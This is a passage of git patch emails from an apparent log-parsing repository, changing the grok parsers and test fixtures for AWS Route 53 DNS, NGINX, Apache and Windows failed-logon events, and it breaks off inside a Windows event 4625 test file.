+    "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":62699,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726395887000,\"time_dt\":1726395887000,\"query\":{\"hostname\":\"settings-win.data.microsoft.com.\",\"type\":\"A\",\"class\":\"IN\"},\"answers\":[{\"type\":\"CNAME\",\"rdata\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"class\":\"IN\"},{\"type\":\"CNAME\",\"rdata\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"class\":\"IN\"},{\"type\":\"A\",\"rdata\":\"5.6.7.8\",\"class\":\"IN\"}],\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":0,\"rcode\":\"NoError\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"answers[].rdata\",\"value\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"answers[].rdata\",\"value\":\"5.6.7.8\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"answers[].rdata\",\"value\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"query.hostname\",\"value\":\"settings-win.data.microsoft.com.\",\"type\":\"Hostname\",\"type_id\":1}]}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OCSF",
+        "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":62699,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726395887000,\"time_dt\":1726395887000,\"query\":{\"hostname\":\"settings-win.data.microsoft.com.\",\"type\":\"A\",\"class\":\"IN\"},\"answers\":[{\"type\":\"CNAME\",\"rdata\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"class\":\"IN\"},{\"type\":\"CNAME\",\"rdata\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"class\":\"IN\"},{\"type\":\"A\",\"rdata\":\"5.6.7.8\",\"class\":\"IN\"}],\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":0,\"rcode\":\"NoError\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"answers[].rdata\",\"value\":\"settings-prod-weu-2.westeurope.cloudapp.azure.com.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"answers[].rdata\",\"value\":\"5.6.7.8\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"answers[].rdata\",\"value\":\"atm-settingsfe-prod-geo2.trafficmanager.net.\",\"type\":\"IP Address\",\"type_id\":2},{\"name\":\"query.hostname\",\"value\":\"settings-win.data.microsoft.com.\",\"type\":\"Hostname\",\"type_id\":1}]}\n",
+    "event": {
+      "action": "traffic",
+      "category": [
+        "network"
+      ],
+      "kind": "event",
+      "severity": 1,
+      "type": [
+        "info",
+        "protocol"
+      ]
+    },
+    "@timestamp": "2024-09-15T10:24:47Z",
+    "cloud": {
+      "account": {
+        "id": "111111111111"
+      },
+      "provider": "AWS",
+      "region": "eu-west-3"
+    },
+    "dns": {
+      "answers": [
+        {
+          "class": "IN",
+          "data": "atm-settingsfe-prod-geo2.trafficmanager.net.",
+          "type": "CNAME"
+        },
+        {
+          "class": "IN",
+          "data": "settings-prod-weu-2.westeurope.cloudapp.azure.com.",
+          "type": "CNAME"
+        },
+        {
+          "class": "IN",
+          "data": "5.6.7.8",
+          "type": "A"
+        }
+      ],
+      "question": {
+        "class": [
+          "IN"
+        ],
+        "name": "settings-win.data.microsoft.com.",
+        "registered_domain": "microsoft.com",
+        "subdomain": "settings-win.data",
+        "top_level_domain": "com",
+        "type": [
+          "A"
+        ]
+      },
+      "response_code": "NoError"
+    },
+    "network": {
+      "direction": [
+        "unknown"
+      ]
+    },
+    "ocsf": {
+      "activity_id": 6,
+      "activity_name": "Traffic",
+      "class_name": "DNS Activity",
+      "class_uid": 4003
+    },
+    "related": {
+      "hosts": [
+        "settings-win.data.microsoft.com."
+      ],
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 62699
+    }
+  }
+}
\ No newline at end of file

From 7470654a8b1a7cabadc70684ab962e7d699febf4 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 27 Sep 2024 18:40:54 +0200
Subject: [PATCH 080/317] fix(Nginx): extract the forwarded ip

---
 NGINX/nginx/ingest/parser.yml             | 6 ++++--
 NGINX/nginx/tests/extended.json           | 7 +++++--
 NGINX/nginx/tests/extended_backslash.json | 3 +++
 3 files changed, 12 insertions(+), 4 deletions(-)

diff --git a/NGINX/nginx/ingest/parser.yml b/NGINX/nginx/ingest/parser.yml
index f2fc51cc1..8a7f7c38b 100644
--- a/NGINX/nginx/ingest/parser.yml
+++ b/NGINX/nginx/ingest/parser.yml
@@ -11,7 +11,7 @@ pipeline:
           ERR_MSG: "[^,]*"
           NGINXURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})"
           ERROR: '%{TIMER:time_error} \[%{WORD:log_level}\] %{NUMBER}#%{NUMBER}: (\*%{NUMBER} )?(%{ERR_MSG:error_message})?(%{DATA}client:\s+%{IP:source_address})?(%{DATA}server:\s+%{IPORHOST:destination_address})?(%{DATA}request: \"%{WORD:request_method} %{NGINXURL:url_original} HTTP/%{NUMBER:http_version}\")?(%{DATA}upstream: \"%{URIPROTO}://(?:%{USER}(?::[^@]*)?@)?(?:%{IPORHOST:url_name}(?::%{POSINT:url_port})?)?(?:%{URIPATHPARAM})?\")?(%{DATA}host:%{DATA}\"%{IPORHOST:host_name}(:%{INT})?\")?(%{DATA}responder:%{DATA}%{IPORHOST:responder_name})?(%{DATA}peer:%{DATA}%{IPORHOST:url_name}(:%{INT:url_port})?)?(%{DATA}certificate:%{DATA}\"%{URIPATH:certificate}\")?%{GREEDYDATA}'
-          COMBINED: '(%{IPORHOST:destination_address} )?%{IP:source_address} - (-|%{DATA:source_user_name})? \[%{HTTPDATE:time_local}\] \"(-|%{WORD:request_method} %{NOTSPACE:url_original} HTTP/%{NUMBER:http_version}|%{HTTP_ERROR:raw_url})?\" %{NUMBER:response_status} (-|%{NUMBER:body_bytes_sent})? \"(-|%{DATA:http_referrer})?\" \"%{DATA:http_user_agent}\"( \"%{DATA}\")?( \"%{DATA}\")?( \"%{DATA}\")?( \"%{DATA:http_response_mimetype}\")?(%{GREEDYDATA})?'
+          COMBINED: '(%{IPORHOST:destination_address} )?%{IP:source_address} - (-|%{DATA:source_user_name})? \[%{HTTPDATE:time_local}\] \"(-|%{WORD:request_method} %{NOTSPACE:url_original} HTTP/%{NUMBER:http_version}|%{HTTP_ERROR:raw_url})?\" %{NUMBER:response_status} (-|%{NUMBER:body_bytes_sent})? \"(-|%{DATA:http_referrer})?\" \"%{DATA:http_user_agent}\"( \"%{DATA:proxy_add_x_forwarded_for}\")?( \"%{DATA}\")?( \"%{DATA}\")?( \"%{DATA:http_response_mimetype}\")?(%{GREEDYDATA})?'
     filter: '{{original.message | re_match("\{(?:[^{}]|())*\}") == False}}'
   - name: parsed_event
     external:
@@ -99,7 +99,6 @@ stages:
             {%- endif -%}
           host.name: "{{parsed_event.message.host_name}}"
           log.level: "{{parsed_event.message.log_level}}"
-          network.forwarded_ip: "{{parsed_event.message.proxy_add_x_forwarded_for}}"
           network.protocol: "{{parsed_event.message.http_scheme}}"
           nginx.server.certificate.directory: "{{parsed_event.message.certificate.split('/')[:-1]|join('/')}}"
           nginx.server.certificate.extension: "{{parsed_event.message.certificate.split('.')|last}}"
@@ -109,6 +108,9 @@ stages:
       - set:
           source.ip: "{{parsed_event.message.remote_addr}}"
         filter: "{{parsed_event.message.remote_addr | is_ipaddress}}"
+      - set:
+          network.forwarded_ip: "{{parsed_event.message.proxy_add_x_forwarded_for.split(', ')[0]}}"
+        filter: "{{parsed_event.message.proxy_add_x_forwarded_for not in ['', '-']}}"
       - set:
           source.ip: "{{parsed_event.message.source_address}}"
         filter: "{{parsed_event.message.source_address | is_ipaddress}}"
diff --git a/NGINX/nginx/tests/extended.json b/NGINX/nginx/tests/extended.json
index c4309202b..4a01e55f4 100644
--- a/NGINX/nginx/tests/extended.json
+++ b/NGINX/nginx/tests/extended.json
@@ -1,9 +1,9 @@
 {
   "input": {
-    "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4\" \"0.010\" \"-/-\" \"text/plain\""
+    "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4, 4.3.2.1\" \"0.010\" \"-/-\" \"text/plain\""
   },
   "expected": {
-    "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4\" \"0.010\" \"-/-\" \"text/plain\"",
+    "message": " rdp.acme.com 1.2.3.4 - - [22/Aug/2019:08:28:30 +0200] \"GET /lib/example.txt?key1=111111&time=1566455309850 HTTP/1.1\" 200 2 \"http://rdp.acme.com/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\" \"1.2.3.4, 4.3.2.1\" \"0.010\" \"-/-\" \"text/plain\"",
     "event": {
       "category": [
         "web"
@@ -30,6 +30,9 @@
       },
       "version": "1.1"
     },
+    "network": {
+      "forwarded_ip": "1.2.3.4"
+    },
     "observer": {
       "product": "nginx",
       "type": "WEB server",
diff --git a/NGINX/nginx/tests/extended_backslash.json b/NGINX/nginx/tests/extended_backslash.json
index ab67bc37a..ff603b50e 100644
--- a/NGINX/nginx/tests/extended_backslash.json
+++ b/NGINX/nginx/tests/extended_backslash.json
@@ -30,6 +30,9 @@
       },
       "version": "1.1"
     },
+    "network": {
+      "forwarded_ip": "1.2.3.4"
+    },
     "observer": {
       "product": "nginx",
       "type": "WEB server",

From c1f0eddd2dee04e2096701fc8647d91c81fda83a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 27 Sep 2024 19:13:06 +0200
Subject: [PATCH 081/317] fix(Apache): extract the destination address from the
 extended logs

---
 Apache/apache/ingest/parser.yml          |  6 ++++--
 Apache/apache/tests/access_extended.json | 15 ++++++++++-----
 2 files changed, 14 insertions(+), 7 deletions(-)

diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index 8754527ec..6f5dc2641 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -12,9 +12,9 @@ pipeline:
           # HTTPD standard logs
           HTTPD20_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{LOGLEVEL:action_name}\] (?:\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?\] ){0,1}%{GREEDYDATA:action_outcome_reason}'
           HTTPD24_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{WORD}?:%{LOGLEVEL:action_name}\] \[pid %{POSINT:process_id}(:tid %{NUMBER:process_thread_id})?\]( \(%{POSINT}\)%{DATA}:)?( \[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{POSINT:source_port})?\])?( %{DATA}:)? %{GREEDYDATA:action_outcome_reason}'
-          HTTPD_COMBINEDLOG: "%{HTTPD_COMMONLOG} %{QS:http_request_referrer} %{QS:user_agent_original}"
+          HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} %{QS:http_request_referrer} %{QS:user_agent_original}'
           HTTPD_COMMONLOG: >-
-            %{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA}
+            (%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?%{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA}
           # Apache ModSecurity logs
           APACHEERRORPREFIX: '(\[%{HTTPDERROR_DATE:timestamp}\] )?(\[%{WORD}?:%{LOGLEVEL:action_name}\] )?(\[pid %{POSINT:process_pid}(:tid %{NUMBER:process_thread_id})?\] )?(\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{NUMBER:source_port})?\])?.*'
           MODSECHOSTNAME: '\[hostname "?%{DATA:destination_domain}"?\]'
@@ -111,6 +111,8 @@ stages:
           url.original: "{{grok.event.url_original}}"
           user.name: "{{grok.event.user_name}}"
           user_agent.original: "{{grok.event.user_agent_original}}"
+          destination.address: "{{grok.event.destination_address}}"
+          destination.port: "{{grok.event.destination_port}}"
       - translate:
         dictionary:
           "info": ["info"]
diff --git a/Apache/apache/tests/access_extended.json b/Apache/apache/tests/access_extended.json
index b2c17d072..ccc1688fb 100644
--- a/Apache/apache/tests/access_extended.json
+++ b/Apache/apache/tests/access_extended.json
@@ -1,6 +1,6 @@
 {
   "input": {
-    "message": "24.202.202.247 - - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384",
+    "message": "mydomain:443 1.2.3.4 - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384",
     "sekoiaio": {
       "intake": {
         "dialect": "Apache HTTP Server",
@@ -9,7 +9,7 @@
     }
   },
   "expected": {
-    "message": "24.202.202.247 - - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384",
+    "message": "mydomain:443 1.2.3.4 - - [31/Jul/2024:16:41:52 +0200] \"GET /test/integration/abcdefgh123456.js HTTP/1.1\" 200 5771 \"https://www.website.fr/\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/10101010 Firefox/128.0\" GoAway=- (107 47us) TLSv1.3 TLS_AES_256_GCM_SHA384",
     "event": {
       "category": [
         "web"
@@ -26,6 +26,11 @@
         "timestamp": "31/Jul/2024:16:41:52 +0200"
       }
     },
+    "destination": {
+      "address": "mydomain",
+      "port": 443,
+      "size_in_char": 0
+    },
     "http": {
       "request": {
         "method": "GET"
@@ -38,12 +43,12 @@
     },
     "related": {
       "ip": [
-        "24.202.202.247"
+        "1.2.3.4"
       ]
     },
     "source": {
-      "address": "24.202.202.247",
-      "ip": "24.202.202.247"
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
     },
     "url": {
       "original": "/test/integration/abcdefgh123456.js",

From 4a86df3cec4bc3edc62eaa07053f92e5baa6fffa Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 27 Sep 2024 19:15:50 +0200
Subject: [PATCH 082/317] fix(Apache): removed quotes from the extracted
 referer and the extracted user agent

---
 Apache/apache/ingest/parser.yml          | 2 +-
 Apache/apache/tests/access_combined.json | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index 6f5dc2641..9375aab8a 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -12,7 +12,7 @@ pipeline:
           # HTTPD standard logs
           HTTPD20_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{LOGLEVEL:action_name}\] (?:\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?\] ){0,1}%{GREEDYDATA:action_outcome_reason}'
           HTTPD24_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{WORD}?:%{LOGLEVEL:action_name}\] \[pid %{POSINT:process_id}(:tid %{NUMBER:process_thread_id})?\]( \(%{POSINT}\)%{DATA}:)?( \[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{POSINT:source_port})?\])?( %{DATA}:)? %{GREEDYDATA:action_outcome_reason}'
-          HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} %{QS:http_request_referrer} %{QS:user_agent_original}'
+          HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} "%{DATA:http_request_referrer}" "%{DATA:user_agent_original}"'
           HTTPD_COMMONLOG: >-
             (%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?%{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA}
           # Apache ModSecurity logs
diff --git a/Apache/apache/tests/access_combined.json b/Apache/apache/tests/access_combined.json
index 4197c7d41..75299a8f6 100644
--- a/Apache/apache/tests/access_combined.json
+++ b/Apache/apache/tests/access_combined.json
@@ -23,7 +23,7 @@
     "http": {
       "request": {
         "method": "GET",
-        "referrer": "\"http://www.example.com/start.html\""
+        "referrer": "http://www.example.com/start.html"
       },
       "response": {
         "bytes": 2326,
@@ -55,7 +55,7 @@
         "name": "Other"
       },
       "name": "Other",
-      "original": "\"Mozilla/4.08 [en] (Win98; I ;Nav)\"",
+      "original": "Mozilla/4.08 [en] (Win98; I ;Nav)",
       "os": {
         "name": "Windows",
         "version": "98"

From 9db084b3dbfa323fac246e3f935cfb303aef923c Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 27 Sep 2024 19:16:11 +0200
Subject: [PATCH 083/317] feat(Apache): add ignored values

---
 Apache/apache/ingest/parser.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index 9375aab8a..f484b598d 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -1,4 +1,5 @@
 name: apache
+ignored_values: ["","-"]
 pipeline:
   - name: grok
     description: parse received message

From 73fd8adf2feeed759bb04473394f8cb947e5df71 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 27 Sep 2024 19:19:52 +0200
Subject: [PATCH 084/317] fix(Apache): Apply prettier

---
 Apache/apache/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index f484b598d..ceb5fe576 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -1,5 +1,5 @@
 name: apache
-ignored_values: ["","-"]
+ignored_values: ["", "-"]
 pipeline:
   - name: grok
     description: parse received message

From 9cccd12f4a5de3635bf182365b94c8cb6aba220f Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Mon, 30 Sep 2024 13:46:18 +0300
Subject: [PATCH 085/317] Fix: Windows get failure reason

---
 Windows/windows/ingest/parser.yml            |  12 ++-
 Windows/windows/tests/Event_4625_reason.json | 106 +++++++++++++++++++
 2 files changed, 117 insertions(+), 1 deletion(-)
 create mode 100644 Windows/windows/tests/Event_4625_reason.json

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 8107e623a..fe3cbc5db 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -112,6 +112,16 @@ pipeline:
           CONTEXTINFO_FR: "(%{SPACE}Gravit%{DATA} = %{DATA:Severity}#NEWLINE#%{SPACE}Nom d%{DATA}h%{DATA}te = %{DATA:HostName}#NEWLINE#%{SPACE}Version de l%{DATA}h%{DATA}te = %{DATA:HostVersion}#NEWLINE#%{SPACE}ID d%{DATA}h%{DATA}te = %{DATA:HostId}#NEWLINE#%{SPACE}Application h%{DATA}te = %{DATA:HostApplication}#NEWLINE#%{SPACE}Version du moteur = %{DATA:EnginVersion}#NEWLINE#%{SPACE}ID d%{DATA}instance d%{DATA}ex%{DATA}cution = %{DATA:RunspaceID}#NEWLINE#%{SPACE}ID de pipeline = %{DATA:PipelineID}#NEWLINE#%{SPACE}Nom de commande = %{DATA:CommandName}#NEWLINE#%{SPACE}Type de commande = %{DATA:CommantType}#NEWLINE#%{SPACE}Nom du script = %{DATA:ScriptName}#NEWLINE#%{SPACE}Chemin de la commande = %{DATA:CommandPath}#NEWLINE#%{SPACE}Num%{DATA}ro de s%{DATA}quence = %{DATA:SequenceNumber}#NEWLINE#%{SPACE}Utilisateur = %{DATA:User}#NEWLINE#%{SPACE}Utilisateur connect%{DATA} = %{DATA:ConnectedUser}#NEWLINE#%{SPACE}ID d%{DATA}interpr%{DATA}teur de commandes = %{DATA:ShellID}#NEWLINE#%{GREEDYDATA})"
           CONTEXTINFO_EN: "(%{SPACE}Severity = %{DATA:Severity}#NEWLINE#%{SPACE}Host Name = %{DATA:HostName}#NEWLINE#%{SPACE}Host Version = %{DATA:HostVersion}#NEWLINE#%{SPACE}Host ID = %{DATA:HostID}#NEWLINE#%{SPACE}Host Application = %{DATA:HostApplication}#NEWLINE#%{SPACE}Engine Version = %{DATA:EnginVersion}#NEWLINE#%{SPACE}Runspace ID = %{DATA:RunspaceID}#NEWLINE#%{SPACE}Pipeline ID = %{DATA:PipelineID}#NEWLINE#%{SPACE}Command Name = %{DATA:CommandName}#NEWLINE#%{SPACE}Command Type = %{DATA:CommandType}#NEWLINE#%{SPACE}Script Name = %{DATA:ScriptName}#NEWLINE#%{SPACE}Command Path = %{DATA:CommandPath}#NEWLINE#%{SPACE}Sequence Number = %{DATA:SequenceNumber}#NEWLINE#%{SPACE}User = %{DATA:User}#NEWLINE#%{SPACE}Connected User = %{DATA:ConnectedUser}#NEWLINE#%{SPACE}Shell ID = %{DATA:ShellID}#NEWLINE#)"
 
+  - name: message_failure_reason
+    filter: "{{json.event.Message != null and 'Failure Reason' in json.event.Message}}"
+    external:
+      name: grok.match
+      properties:
+        input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
+        output_field: result
+        pattern: >-
+          (%{GREEDYDATA}Failure Reason:\t\t%{DATA:FailureReason}#NEWLINE#\t%{GREEDYDATA})
+
   - name: network_object
     description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format.
     filter: "{{json.event.Message != null and 'Accesses' in json.event.Message}}"
@@ -275,7 +285,7 @@ stages:
           event.code: "{{json.event.EventID}}"
           action.id: "{{json.event.EventID}}"
           event.provider: "{{json.event.SourceName}}"
-          event.reason: "{{json.event.Description}}"
+          event.reason: "{{json.event.Description or message_failure_reason.result.FailureReason}}"
           file.created: "{{json.event.CreationUtcTime}}"
           file.owner: "{{json.event.jobOwner}}"
           log.hostname: "{{json.event.Hostname}}"
diff --git a/Windows/windows/tests/Event_4625_reason.json b/Windows/windows/tests/Event_4625_reason.json
new file mode 100644
index 000000000..8c5712d9d
--- /dev/null
+++ b/Windows/windows/tests/Event_4625_reason.json
@@ -0,0 +1,106 @@
+{
+  "input": {
+    "message": "{\"Category\":\"Logon\",\"Channel\":\"Security\",\"EventID\":4625,\"EventType\":\"AUDIT_FAILURE\",\"Hostname\":\"test.test\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Advapi  \",\"LogonType\":\"3\",\"Message\":\"An account failed to log on.\\r\\n\\r\\nSubject:\\r\\n\\tSecurity ID:\\t\\tS-1-5-18\\r\\n\\tAccount Name:\\t\\tTESTACCOUNTS$\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\tLogon ID:\\t\\t0x3E7\\r\\n\\r\\nLogon Type:\\t\\t\\t3\\r\\n\\r\\nAccount For Which Logon Failed:\\r\\n\\tSecurity ID:\\t\\tS-1-0-0\\r\\n\\tAccount Name:\\t\\tTEST-USERNAME\\r\\n\\tAccount Domain:\\t\\tDOMAINNAME\\r\\n\\r\\nFailure Information:\\r\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\r\\n\\tStatus:\\t\\t\\t0xC000006D\\r\\n\\tSub Status:\\t\\t0xC000006A\\r\\n\\r\\nProcess Information:\\r\\n\\tCaller Process ID:\\t0x25c\\r\\n\\tCaller Process Name:\\tC:\\\\Windows\\\\System32\\\\lsass.exe\\r\\n\\r\\nNetwork Information:\\r\\n\\tWorkstation Name:\\tTESTACCOUNTS\\r\\n\\tSource Network Address:\\t192.168.128.203\\r\\n\\tSource Port:\\t\\t41974\\r\\n\\r\\nDetailed Authentication Information:\\r\\n\\tLogon Process:\\t\\tAdvapi  \\r\\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\r\\n\\tTransited Services:\\t-\\r\\n\\tPackage Name (NTLM only):\\t-\\r\\n\\tKey Length:\\t\\t0\\r\\n\\r\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\r\\n\\r\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\r\\n\\r\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\r\\n\\r\\nThe Process Information fields indicate which account and process on the system requested the logon.\\r\\n\\r\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\r\\n\\r\\nThe authentication information fields provide 